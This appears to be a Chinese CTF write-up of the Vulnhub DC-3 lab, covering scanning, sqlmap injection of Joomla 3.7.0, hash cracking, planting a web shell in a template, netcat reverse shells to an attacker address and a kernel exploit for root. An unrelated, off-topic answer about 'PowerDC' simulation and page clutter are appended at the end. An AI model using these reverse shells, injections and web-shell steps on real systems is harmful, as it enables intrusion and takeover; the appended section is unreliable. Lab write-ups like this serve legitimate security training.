DC-3入门练习

本文详述了Vulnhub DC3靶机的渗透测试过程,从环境搭建到利用SQL注入获取管理员权限,再到反弹Shell及提权,最终获取Flag。

Vulnhub-DC3

1. 搭建靶机环境

准备DC-3靶机在(vulnhub),并查看MAC地址为后期扫描做准备(黑盒测试)
在这里插入图片描述
在这里插入图片描述

2. 扫描指纹识别

1.nmap扫描找到dc-3靶机地址

nmap -sP 192.168.1.15 -p 1-65535 -oN nmap.sP            //nmap扫描
netdiscover -r 192.168.1.0/24        					//netdiscover扫描这两个都可以         

在这里插入图片描述
在这里插入图片描述
2.nmap扫描靶机ip,进行端口扫描

nmap -A 192.168.1.15 -p 1-65535 -oN nmap.A

在这里插入图片描述
发现80端口开放,访问80
在这里插入图片描述
3.进行指纹识别

whatweb http://192.168.1.15

发现主机是linux,ubuntu,网站是开源之一的Joomla站搭建
在这里插入图片描述
4.joomscan扫描
joomscan可以扫描检测joomla整站程序搭建的网站是否存在文件包含,sql注入,命令执行漏洞.

joomscan --url http://192.168.1.15

扫描出joomla的版本和一些网页目录,网站后台
在这里插入图片描述
查看这些网页:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
5.利用kali自带漏洞源查找joomla 3.7.0可能存在漏洞

searchsploit joomla 3.7.0
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomalv370_sqli.txt

发现joomla存在sql注入漏洞,把他复制到目录下打开
在这里插入图片描述
发现存在注入的url和SQLmap用法
在这里插入图片描述

3. sqlmap进行注入

1.列出数据库

sqlmap -u "http://l192.168.1.15/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

猜测数据库为joomladb
在这里插入图片描述
2.列出表名

sqlmap -u "http://l192.168.1.15/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --columns -p list[fullordering]

猜测表名为#__users
在这里插入图片描述

3.列出字段

sqlmap -u "http://192.168.1.15/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users"  --columns  -p list[fullordering]

在这里插入图片描述

4.查看字段内容

sqlmap -u "http://192.168.1.15/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users"  -C name,password --dump  -p list[fullordering]

发现密码是一串哈希值
在这里插入图片描述
5.对hash值解密爆破
将哈希值存入txt文件中

vim joomlav370_admin_hash.txt

在这里插入图片描述
爆破密码

john joomlav370_admin_hash.txt

账号:admin
密码:snoopy
在这里插入图片描述

4. 登录后台搜集信息

1.成功登陆随便看看
发现在这个目录下有一个模板(通常模板是在根目录下我们尝试了一下发现模板不是根目录下)
在这里插入图片描述
在这里插入图片描述
进入这个模板发现可以创建文件以及管理文件,这里我们想到上传一句话木马,然后菜刀连接,但是我们不知道一句话木马的位置
在这里插入图片描述
此时突然想到之前扫描出来的网站目录和现在目录相关的有templates,访问该目录
在这里插入图片描述
猜想beez3在templates目录下(无报错说明正确)
在这里插入图片描述
在这里插入图片描述

5. 上传木马

接下来我们可以在该目录下html文件中添加木马
在这里插入图片描述
然后访问看是否上传成功
在这里插入图片描述

6. 用蚁剑进行连接(注意:刚开始用菜刀怎么都连接不成功后来换蚁剑可以)

在这里插入图片描述
打开终端(用户权限为www-date,接下来要反弹shell和提权)
在这里插入图片描述

7. 反弹shell

为什么要反弹shell?
通常用于被控端因防火墙受限、权限不足、端口被占用等情形。
举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。那么什么情况下正向连接不能用了呢?
有如下情况
1.某客户机中了你的网马,但是它在局域网内,你直接连接不了。
2.目标机器的ip动态改变,你不能持续控制。
3.由于防火墙等限制,对方机器只能发送请求,不能接收请求。
4.对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机等情况都是未知的,所以建立一个服务端让恶意程序主动连接,才是上策。
那么反弹就很好理解了,攻击者指定服务端,受害者主机主动连接攻击者的服务端程序,就叫反弹连接。

kali本地监听

nc -lvvp 2333

蚁剑虚拟终端(服务端)主动连接kali(客户端)

nc -e /bin/bash 192.168.1.12 2333
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.12 2333 >/tmp/f

在这里插入图片描述
反弹成功
在这里插入图片描述

8. 提权

到达这里后,我们目前只知道服务端版本信息和网站指纹,所以可以尝试系统漏洞提权
思路·:
1.利用操作系统本版号 (这里是ubuntu 16.04)
2.根据版本号搜索exp
3.反弹shell(这里我们已经反弹)
4.利用exp提权

1.找到漏洞后后把他复制到本地:

searchsploit ubuntu 16.04
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt
cat ubuntu1604_shell.txt

在这里插入图片描述
2.打开并下载exp
在这里插入图片描述
然后下载:(这里由于是国外服务器所以我们下载失败)

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在这里插入图片描述
我们可以把这个exp放在本地搭建的服务器上,然后wget下载,下面是exp资源(这里注意wget下载是在反弹shell的主机)

EXP资源

链接:https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g 
提取码:0fkw

在这里插入图片描述
3.解压exp

unzip 39772.zip

cd 39772

在这里插入图片描述

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

在这里插入图片描述

./compile.sh

./doublepu

4.运行脚本提权成功
然后进去 /root目录下,查看文件发现flag
在这里插入图片描述

DC靶机系列入门详解,关注查看下一篇

### 回答1: PowerDC仿真是针对直流电源和直流系统进行仿真和优化的工具。它可以帮助我们生成电路图、进行电路分析、进行参数优化、设计新型直流系统和电源等。对于初学者来说,入门PowerDC仿真需要掌握基础的几个方面。 首先,熟悉仿真软件本身。PowerDC可以在Windows或者Linux上运行,并且提供直观的用户界面和完善的帮助文档。我们需要了解软件本身的功能和操作方式,例如如何添加元件、如何连接元件、如何设置参数等等。 其次,学会建立电路模型。在PowerDC仿真中,我们需要先建立一个电路模型,包括电路图中的元件、连接方式以及元件的参数设置。需要注意的是,建立电路模型需要具备一定的电路基础知识和数学功底。 第三,进行电路分析。在电路模型建立好之后,我们可以进行各种电路分析,例如直流分析、交流分析、温度分析等,以及对电路参数进行优化调整,以提高电路性能。 最后,学习电路优化。通过电路分析的结果,我们可以对电路进行进一步优化,例如通过改进元件参数、修改连接方式或者更换元件等方式,来提高电路性能和效率。 总的来说,PowerDC仿真是一款强大的工具,但是入门需要我们具备基础的电路知识和数学功底,不断练习和尝试,才能掌握其使用方法,成功进行电路设计和优化。 ### 回答2: PowerDC仿真是一种电力系统仿真软件,可以用于模拟电力系统的运行状态和分析系统的稳定性。本文着重介绍PowerDC仿真的入门内容,其中包括仿真软件的安装、界面介绍、仿真流程以及基本操作等方面。 首先,PowerDC仿真软件需要在电脑上进行安装。安装过程中需要注意操作系统的版本,以及软件是否与操作系统兼容。安装完成后,打开软件进入主界面。 主界面上方为菜单栏,包括文件、编辑、仿真和视图等模块。左边为操作面板,可以进行仿真模型的建立、测试和仿真结果的分析。右边为仿真模型的绘图区域,可以进行仿真模型的绘制和修改。 在PowerDC仿真中,建立仿真模型是用户的第一步。用户可以根据电力系统的实际情况选取不同的元器件和连接方式,进行仿真模型的绘制。绘制完成后,用户需要进行仿真参数的设定,如电源电压、电阻、电感、电容等。 当仿真模型建立和参数设定完成后,用户需要进行仿真运行。在仿真运行中,用户可以观察电力系统的工作状态,如各个元器件的电流、电压、功率等。同时,仿真运行还可以用于分析系统的稳定性和短路保护方案等。 除了以上基本操作外,PowerDC仿真还提供了其他功能,如参数扫描、结果显示和数据分析等。用户可以根据自身需求选择不同的功能进行使用,以达到更精细的仿真结果和更深入的分析。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值